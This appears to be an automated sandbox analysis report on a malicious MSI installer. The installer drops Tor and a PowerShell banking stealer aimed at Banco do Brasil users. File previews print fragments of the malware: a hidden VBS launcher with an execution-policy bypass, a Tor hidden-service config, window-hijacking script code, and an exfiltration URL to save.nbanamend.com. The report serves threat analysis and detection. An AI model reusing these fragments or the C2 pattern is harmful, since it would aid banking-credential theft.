Process tree (node numbers as shown in the graph):

  • 10 msiexec.exe (started)
      Dropped: C:\Windows\Installer\MSIFCD8.tmp, PE32; C:\Windows\Installer\MSIE39F.tmp, PE32; C:\Windows\Installer\MSIE275.tmp, PE32; 14 other files (none is malicious)
      • 18 msiexec.exe (started)
          Dropped: C:\Users\user\AppData\Local\...\scrFDAD.txt, Little-endian; C:\Users\user\AppData\Local\...\scrFDAC.ps1, Little-endian; C:\Users\user\AppData\Local\...\pssFF45.ps1, Little-endian
          Signature: Bypasses PowerShell execution policy
          • 24 powershell.exe (started)
              DNS/IP: save.nbanamend.com 104.21.91.13, 443, 49770 CLOUDFLARENETUS United States
              Dropped: C:\JQHPQS\zlib1.dll, PE32; C:\JQHPQS\tor.exe, PE32; C:\JQHPQS\tor-gencert.exe, PE32; 11 other malicious files
              Signatures: Powershell creates an autostart link; Powershell drops PE file
              • 29 wscript.exe (started)
                  Signature: Wscript starts Powershell (via cmd or directly)
                  • 34 MRZANK.exe (started)
                      DNS/IP: 205.185.127.35, 49775, 9100 PONYNETUS United States; 213.226.71.164, 49788, 9001 MELBICOM-EU-ASMelbikomasUABNL Germany; 4 other IPs or domains
                      • 39 conhost.exe (started)
                  • 37 powershell.exe (started)
                      • 41 conhost.exe (started)
                      • 43 powershell.exe (started)
              • 32 conhost.exe (started)
  • 13 wscript.exe (started)
      Signature: Wscript starts Powershell (via cmd or directly)
      • 22 MRZANK.exe (started)
  • 16 msiexec.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| YwZpT3p5Rh.msi | 2% | Virustotal | |
| YwZpT3p5Rh.msi | 2% | ReversingLabs | |

Dropped Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\JQHPQS\MRZANK.exe (copy) | 0% | Metadefender | |
| C:\JQHPQS\MRZANK.exe (copy) | 0% | ReversingLabs | |
| C:\JQHPQS\QRROJT.exe (copy) | 2% | ReversingLabs | |
| C:\JQHPQS\capturador.exe | 2% | ReversingLabs | |
| C:\JQHPQS\libcrypto-1_1.dll | 0% | Metadefender | |
| C:\JQHPQS\libcrypto-1_1.dll | 0% | ReversingLabs | |
| C:\JQHPQS\libevent-2-1-7.dll | 3% | Metadefender | |
| C:\JQHPQS\libevent-2-1-7.dll | 0% | ReversingLabs | |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| https://$domain/new.php?data=$dataEnc | 0% | Avira URL Cloud | safe |
| https://save.nbanamend.com/new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06 | 0% | Avira URL Cloud | safe |
| https://contoso.com/ | 0% | URL Reputation | safe |
| https://freehaven.net/anonbib/#hs-attack06 | 0% | Virustotal | |
| https://freehaven.net/anonbib/#hs-attack06 | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| save.nbanamend.com | 104.21.91.13 | true | false | | high |

Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://save.nbanamend.com/new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06 | false | Avira URL Cloud: safe | unknown |

URLs from Memory and Binaries

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp | false | | high |
| https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
| https://bugs.torproject.org/tpo/core/tor/21155. | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://www.torproject.org/ | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://$domain/new.php?data=$dataEnc | powershell.exe, 00000005.00000003.348135204.00000000074E4000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low |
| https://bugs.torproject.org/tpo/core/tor/14917. | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://blog.torproject.org/v2-deprecation-timelineCalled | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmp | false | | high |
| https://blog.torproject.org/blog/lifecycle-of-a-new-relay | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://blog.torproject.org/v2-deprecation-timeline | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://www.torproject.org/download/download#warningalphabetaThis | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| http://mingw-w64.sourceforge.net/X | MRZANK.exe, 00000012.00000002.547207485.00000000691A2000.00000008.00020000.sdmp | false | | high |
| http://www.zlib.net/D | MRZANK.exe, 00000012.00000002.550461147.000000006B464000.00000008.00020000.sdmp | false | | high |
| https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://www.torproject.org/documentation.html | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmp | false | | high |
| https://www.openssl.org/H | MRZANK.exe, 00000012.00000002.546580931.0000000069123000.00000008.00020000.sdmp | false | | high |
| https://freehaven.net/anonbib/#hs-attack06 | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://www.torproject.org/download/download#warning | MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmp | false | | high |
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.397419806.0000000004501000.00000004.00000001.sdmpfalse
                                            high
                                            https://bugs.torproject.org/tpo/core/tor/8742.MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                              high
                                              https://www.torproject.org/docs/faq.html#BestOSForRelayMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                                high

                                                Contacted IPs

                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
95.211.136.23 | unknown | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | false
88.99.32.114 | unknown | Germany | 24940 | HETZNER-ASDE | false
213.226.71.164 | unknown | Germany | 56630 | MELBICOM-EU-ASMelbikomasUABNL | false
185.14.97.36 | unknown | Cyprus | 41801 | DATAFON-ASNTR | false
104.21.91.13 | save.nbanamend.com | United States | 13335 | CLOUDFLARENETUS | false
205.185.127.35 | unknown | United States | 53667 | PONYNETUS | false

                                                Private

                                                IP
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:527489
                                                Start date:23.11.2021
                                                Start time:20:59:28
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 15m 10s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:YwZpT3p5Rh.msi
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:35
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal72.evad.winMSI@27/90@1/7
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .msi
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.54.110.249
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
21:01:07 | API Interceptor | 542x Sleep call for process: powershell.exe modified
21:01:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upspur.lnk

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Config.Msi\3ed8e0.rbs
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2534
                                                Entropy (8bit):5.467334681181493
                                                Encrypted:false
                                                SSDEEP:48:o1VI5ARdGx93TR96EuwE4wSv+t6EIp9qvb:oc5AOTu/lcQ
                                                MD5:D1EBAEF38BBD92FA323CB8FA90B0908A
                                                SHA1:89FB91570E30C67414D83709FCDEE85230154769
                                                SHA-256:E57AAF74B5670AA6AB9BF9EF08EAEA5322379DC338367545DBAE5A5CA7109BCD
                                                SHA-512:56292EFFBB8364EBB4E9C59975EB87B66063D5343BCA73F38567BBCB5F1B953AC82AE50D7EFAF558C005E04F18F8D4EBCB8F0BE2F3C8136323D6DFCDE3E942BA
                                                Malicious:false
                                                Reputation:unknown
                                                C:\JQHPQS\AZJVGE
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):93
                                                Entropy (8bit):4.709535392630383
                                                Encrypted:false
                                                SSDEEP:3:+snDHNu5ICkRENBov+snDH6wyVov3pRvy:+snTNu581nTDyCvZRa
                                                MD5:FFF5F1A728740ED0D126837E9E8FF116
                                                SHA1:77F745AA4A2B17B262095A93DB8D6681C95E9260
                                                SHA-256:A6DD0C6F283B1FFF9DCA4DDC58426F5D066EE2F970AFC2289EC2928FC41778AC
                                                SHA-512:3EAD2D98BA9963BCF43A76F1F153DB119BD7F7AFABBF0A3DE0A605B08058A1FB9C56B325DA3BDD46682D368EA990369798C5DFE911C245C8793BA50A4BAD236E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: HiddenServiceDir C:\ProgramData\hscore..HiddenServicePort 1001 127.0.0.1:30900..SocksPort 0..
                                                C:\JQHPQS\ECSGNO.vbs
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):241
                                                Entropy (8bit):5.3591166922483655
                                                Encrypted:false
                                                SSDEEP:6:FERtbFHmcdR2sTKJytbFHsnytGQO0cg8scpLACsrwyu:+RtRE7stRsnGHpcUBrwX
                                                MD5:CF4BFCE60D83A01A356C21703C21C107
                                                SHA1:E65F38055CCB09777739336ABC6BF89F59662D63
                                                SHA-256:9F8ABECAA058222D71572A32A862FB0D32447632A6B144C75296266D20D976F6
                                                SHA-512:2A5D9D17B1D828606AED23AFB6433464D6537F1B6A8008006F190311D2F5D5628A185E21732770199832423A4E513CCF86D2FFFD69A21433D122330E084A8999
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: CreateObject("Wscript.Shell").Run "C:\JQHPQS\MRZANK.exe -f C:\JQHPQS\AZJVGE", 0, False..CreateObject("Wscript.Shell").Run "powershell.exe -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com", 0, False..
                                                C:\JQHPQS\MRZANK.exe (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):4229632
                                                Entropy (8bit):6.445770642858094
                                                Encrypted:false
                                                SSDEEP:98304:nQcSbHtBsdxf/78Xd1U7hFndQI7yPr5L9E:QXHtBsPj8XdwndQIm
                                                MD5:67AB12CF6CABC14588E4F51B21C2134A
                                                SHA1:32A4FF564F38BF4B62007E419F19C991E60D6E14
                                                SHA-256:F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BA
                                                SHA-512:2A1C67E9D23D6B050E35C5A8E159309CF598095239406C60A9F721FDDC912E21AFAB7036CBD9F77197CC4241DF5F8FA6AA9D7294762659178C6EDEB4699D5BEC
                                                Malicious:true
                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                C:\JQHPQS\QIZABC.ps1 (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1688
                                                Entropy (8bit):5.279662107471557
                                                Encrypted:false
                                                SSDEEP:48:Dxc+6tOtDN95xLoXU8+IDp9frUr4KS692MEX+uCZGYiRIiGLaDr+:DxdpN34VSNsiZGY9yX+
                                                MD5:DD2C9A2529B9DB000E30FE0331F6FFAA
                                                SHA1:B7B89DC1E05479D421153EF5109DC72319C3943E
                                                SHA-256:EEF8C513B78DBE60D5FD2793052F7B29151B96D53A513BF6F2A27AB205A64B14
                                                SHA-512:E359DF6B0B7774E32522BF66932E4DD9561A5CBEA9F982369AB52FB1D51A4B7AD4AD5BAE6747717E126B6B14AB0018AA88B7EFB105E37CA6BCBDE140F60140F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Add-Type -AssemblyName System.Web....$capturerFileName = $args[0]....$domain = $args[1]....Start-Job -ArgumentList $capturerFileName,$(Get-Location) -ScriptBlock {...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -Force............#............if (!($capturerProcess -eq $null)) {.......Stop-Process -Id $capturerProcess.Id -Force......}............#............$capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru...........break.....}....}.......Start-Sleep -Milliseconds 100...}..}....#....$dataPath = "data"..$data = ""....For (;$data -eq "";) {....if (Test-Path -Path $dataPath) {....$data = Get-Content -Path $dataPath...}......Start-Sleep -Milliseconds 100..}....#....$onionHostPath = "$($env:ProgramData)\hscore\hostname"..$onionHost
                                                C:\JQHPQS\QRROJT.exe (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):6.5790668137555635
                                                Encrypted:false
                                                SSDEEP:384:SLGDDCVC75uC3KBLvc1+YPL2jyKvDZOzkcchbWKWXnIaBxopdhxrZNar6xrZNnDH:Z7wFvDckvhQXIVLzar8nDpNbQGB4/BG
                                                MD5:53FC515F425A2CDC9DADF1E139BC142B
                                                SHA1:B63CA1ABAB256B1619DA7DF994497E9F063F6713
                                                SHA-256:DABA783C0B0E47CE3096CA6661E785467B5EB45147DD29C09B77C6B18B7A3D7E
                                                SHA-512:FD91F97825A19C105A1304BC969CEEC33AF89614AA4CAC3C6BF75F3362CCB41C167431493BEBE8CA428FBA587E8089B9EAB7473148009AD9F8DE1A95093C3B1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                Reputation:unknown
                                                C:\JQHPQS\QRROJT.exe.config (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):189
                                                Entropy (8bit):4.986033023891149
                                                Encrypted:false
                                                SSDEEP:3:JLWMNHU8LdgCzMvHcIMOofMuQVQDURAmIRMNHjFHr0lUfEyhTRGOGFvREBAW4QIT:JiMVBdTMkIGMfVJ7VJdfEyFRzSJuAW4p
                                                MD5:9DBAD5517B46F41DBB0D8780B20AB87E
                                                SHA1:EF6AEF0B1EA5D01B6E088A8BF2F429773C04BA5E
                                                SHA-256:47E5A0F101AF4151D7F13D2D6BFA9B847D5B5E4A98D1F4674B7C015772746CDF
                                                SHA-512:43825F5C26C54E1FC5BFFCCE30CAAD1449A28C0C9A9432E9CE17D255F8BF6057C1A1002D9471E5B654AB1DE08FB6EABF96302CDB3E0FB4B63BA0FF186E903BE8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />.. </startup>..</configuration>
                                                C:\JQHPQS\capturador.exe
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):6.5790668137555635
                                                Encrypted:false
                                                SSDEEP:384:SLGDDCVC75uC3KBLvc1+YPL2jyKvDZOzkcchbWKWXnIaBxopdhxrZNar6xrZNnDH:Z7wFvDckvhQXIVLzar8nDpNbQGB4/BG
                                                MD5:53FC515F425A2CDC9DADF1E139BC142B
                                                SHA1:B63CA1ABAB256B1619DA7DF994497E9F063F6713
                                                SHA-256:DABA783C0B0E47CE3096CA6661E785467B5EB45147DD29C09B77C6B18B7A3D7E
                                                SHA-512:FD91F97825A19C105A1304BC969CEEC33AF89614AA4CAC3C6BF75F3362CCB41C167431493BEBE8CA428FBA587E8089B9EAB7473148009AD9F8DE1A95093C3B1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                Reputation:unknown
                                                C:\JQHPQS\capturador.exe.config
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):189
                                                Entropy (8bit):4.986033023891149
                                                Encrypted:false
                                                SSDEEP:3:JLWMNHU8LdgCzMvHcIMOofMuQVQDURAmIRMNHjFHr0lUfEyhTRGOGFvREBAW4QIT:JiMVBdTMkIGMfVJ7VJdfEyFRzSJuAW4p
                                                MD5:9DBAD5517B46F41DBB0D8780B20AB87E
                                                SHA1:EF6AEF0B1EA5D01B6E088A8BF2F429773C04BA5E
                                                SHA-256:47E5A0F101AF4151D7F13D2D6BFA9B847D5B5E4A98D1F4674B7C015772746CDF
                                                SHA-512:43825F5C26C54E1FC5BFFCCE30CAAD1449A28C0C9A9432E9CE17D255F8BF6057C1A1002D9471E5B654AB1DE08FB6EABF96302CDB3E0FB4B63BA0FF186E903BE8
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />.. </startup>..</configuration>
                                                C:\JQHPQS\libcrypto-1_1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):3651526
                                                Entropy (8bit):6.466199643222916
                                                Encrypted:false
                                                SSDEEP:98304:ySBPSXl6cx2yHPp8Bdao0sBIN0iIW9fK4ufzG1Z9Jp/K1CPwDv3uFfJOfjT5YLzc:Bk16cx2yHPp8Bdao0s++ib9fK4uLG1Z4
                                                MD5:3406F79392C47A72BED2F0067B3CE466
                                                SHA1:A8E2940D61FC840441C4E2A835959D197929FFDF
                                                SHA-256:E4B6B2CA32B1E2BA26959EC7380C4F117418D3A724F60494FF3CB81505FBF43D
                                                SHA-512:930D794AA8715DCD23FAFBEAD7FE2EC95D2863783B4C52279870CAD93D5B6CF02BA8A13E2653D2BF731E9882BF63F43A7E44788CE47505346BE3FE8E8B872FA4
                                                Malicious:true
                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                C:\JQHPQS\libevent-2-1-7.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1144039
                                                Entropy (8bit):6.2640955652625285
                                                Encrypted:false
                                                SSDEEP:24576:IdsuH81r7Lfml/aakxLDHGlOhRz7xiOStGX8PxUS2mmAWW:6uL0a3xLDHG8hRz7xiOzX8PxUfmt
                                                MD5:A3BF8E33948D94D490D4613441685EEE
                                                SHA1:75ED7F6E2855A497F45B15270C3AD4AED6AD02E2
                                                SHA-256:91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                                                SHA-512:C20EF2EFCACB5F8C7E2464DE7FDE68BF610AB2E0608FF4DAED9BF676996375DB99BEE7E3F26C5BD6CCA63F9B2D889ED5460EC25004130887CD1A90B892BE2B28
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                C:\JQHPQS\libevent_core-2-1-7.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):975436
                                                Entropy (8bit):6.216593168771383
                                                Encrypted:false
                                                SSDEEP:24576:aYz/U9dYQv6wbSVliNPzIqENbtFXrFKtSRvwwfu:1Za6wbSV4NPzIqENTXrFKtIvG
                                                MD5:686C6A9DA6767287BF2E2126574FAFEA
                                                SHA1:2B0BE53C4AD4B67ECDFDCD97A717DE5A617F9EF0
                                                SHA-256:ABDC8CFB39D1431A1E740CF9DB2BBD604CDB7A4ED79E7E0A68D814E32A296164
                                                SHA-512:3CDE56FF25E53A9A04B5459113C89B8562C01B0F93E39C56BD6536824488F4F9347929935056012ADAA4982CBB8A39B61CE2F17CF92ECF02295AB1A922CD4DD4
                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\libevent_extra-2-1-7.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):683256
                                                Entropy (8bit):6.173131714749706
                                                Encrypted:false
                                                SSDEEP:12288:39gDBeIO2+MMF5lDeXfzxjgtSMStxEX6eg5bTCubl:meh2JMF5lqXfzxUbStyX6eKnCubl
                                                MD5:070F988B98E9717BBD5E870A4F8C1611
                                                SHA1:17FB4C990C13A4FB0A2181FE139D3515FF8D96F6
                                                SHA-256:9DEB6F1776DB51FA7E4E89AD2779A9F07E9F22FCB5E24481FAA291D2D27E43FE
                                                SHA-512:C83D793BBE26E0297F9726B32CAD5BE3F92DBC36717C143FF7D55B7BD7BB20324FD86594BC626A374252656C3EE187FA4DCA4C3933FE19952894042B2127A6FD
                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\libgcc_s_sjlj-1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1095418
                                                Entropy (8bit):6.031576353424405
                                                Encrypted:false
                                                SSDEEP:12288:yWgvC0/HECgnPAPQPtPTPSP7PaadQ2XDPcP8PwPhP5PhP4aEPzPaPugAPnPFgtPD:tmC0/yKX1JzUBDLTl3Ibzz2rnuNY
                                                MD5:BD40FF3D0CE8D338A1FE4501CD8E9A09
                                                SHA1:3AAE8C33BF0EC9ADF5FBF8A361445969DE409B49
                                                SHA-256:EBDA776A2A353F8F0690B1C7706B0CDAFF3D23E1618515D45E451FC19440501C
                                                SHA-512:404FB3C107006B832B8E900F6E27873324CD0A7946CDCCF4FFEEA365A725892D929E8B160379AF9782BCD6CFEB4C3C805740E21280B42BB2CE8F39F26792E5A1
                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\libssl-1_1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1106247
                                                Entropy (8bit):6.189020449469006
                                                Encrypted:false
                                                SSDEEP:24576:mGCAHhCGlXKtc/LuaO88CJcpi9OTXu1UYaBQfPlawVzmkmNXtyRi0H4Ine3/Z0OX:ZCA5DuaOWJUu1UYaBQfPQwVzmkmNXtyk
                                                MD5:9E3D55FBF890C6CBFFD836F2AEF4BA31
                                                SHA1:715890BA3BDA3431470CCA4F4BC492C0F63FA138
                                                SHA-256:E6F4CF41373E8770C670CF5E85461F25385314ED9D8A2B37381BC84F5C0DD5C0
                                                SHA-512:9848F28FD96C21DD054CBF3E722E56373696C1F7803C137AFC7C7203325D9738FA6B984D95CD49FF78A6D95C8F9406F869AF3C3783901DA3CC003E2B09497D65
                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\libssp-0.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):252871
                                                Entropy (8bit):5.911389655551474
                                                Encrypted:false
                                                SSDEEP:6144:DZRBjnF7ModBbDCdcJfstxzeo51aU6grhog4MmwYq55:1BJlDSkYzzugduM5
                                                MD5:B77328DA7CEAD5F4623748A70727860D
                                                SHA1:13B33722C55CCA14025B90060E3227DB57BF5327
                                                SHA-256:46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7
                                                SHA-512:2F1BD13357078454203092ED5DDC23A8BAA5E64202FBA1E4F98EACF1C3C184616E527468A96FF36D98B9324426DDDFA20B62B38CF95C6F5C0DC32513EBACE9E2
                                                Malicious:true
                                                Reputation:unknown
                                                C:\JQHPQS\libwinpthread-1.dll
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):525113
                                                Entropy (8bit):6.099620174174238
                                                Encrypted:false
                                                SSDEEP:12288:/+Pm3Yv9CUauItmEz8HHLOA/TqlDCQdz9bVMPxTivFg:2Pm3Yv9CUauItmEz8HHLOA/TqluQdz9c
                                                MD5:19D7CC4377F3C09D97C6DA06FBABC7DC
                                                SHA1:3A3BA8F397FB95ED5DF22896B2C53A326662FCC9
                                                SHA-256:228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D
                                                SHA-512:23711285352CDEC6815B5DD6E295EC50568FAB7614706BC8D5328A4A0B62991C54B16126ED9E522471D2367B6F32FA35FEB41BFA77B3402680D9A69F53962A4A
